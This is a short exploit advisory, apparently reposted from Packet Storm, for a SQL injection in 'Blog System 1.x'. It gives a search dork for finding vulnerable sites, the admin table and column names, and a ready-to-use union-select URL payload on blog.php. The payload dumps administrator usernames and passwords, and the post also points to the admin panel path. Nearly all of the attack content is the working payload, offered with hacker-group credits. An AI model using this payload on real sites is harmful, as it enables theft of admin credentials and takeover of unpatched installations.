Blog System version 1.x suffer from a remote SQL injection vulnerability.
0aaf501e724b7841dfbdeffdbd934ba2a30f7db4ed31dd8a686effe5355c6001
[#] Script : Blog System
[#] Version : 1.x
[#] Link : http://netartmedia.net/blogsystem/
[#] Author : BorN To K!LL - h4ck3r
[#] Dork : "powered by Blog System"
[#] Table : websiteadmin_admin_users
[#] Columns : id,username,password,type
[#] Exploit : /blog.php?user=[real-user]¬e=-1549+union+all+select+1,2,3,concat_ws(0x3a,id,username,password,type),5,6,7,8,9+from+websiteadmin_admin_users--
[#] CP : /BO
[#] Regards : ('Dr.2' , 'd3hydr8' , 'jonathan59' , 'inkubus' , 'Tundergun' , 'VMw4r3' , 'TinKode' , 'darkc0de's members')
[#] Date : 21-01-2010
[#] Note : replace [real-user] with a user exists in the blog ,, otherwise it will not work.
________________________________
Not got a Hotmail account? Sign-up now - Free<http://clk.atdmt.com/UKM/go/197222280/direct/01/>
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed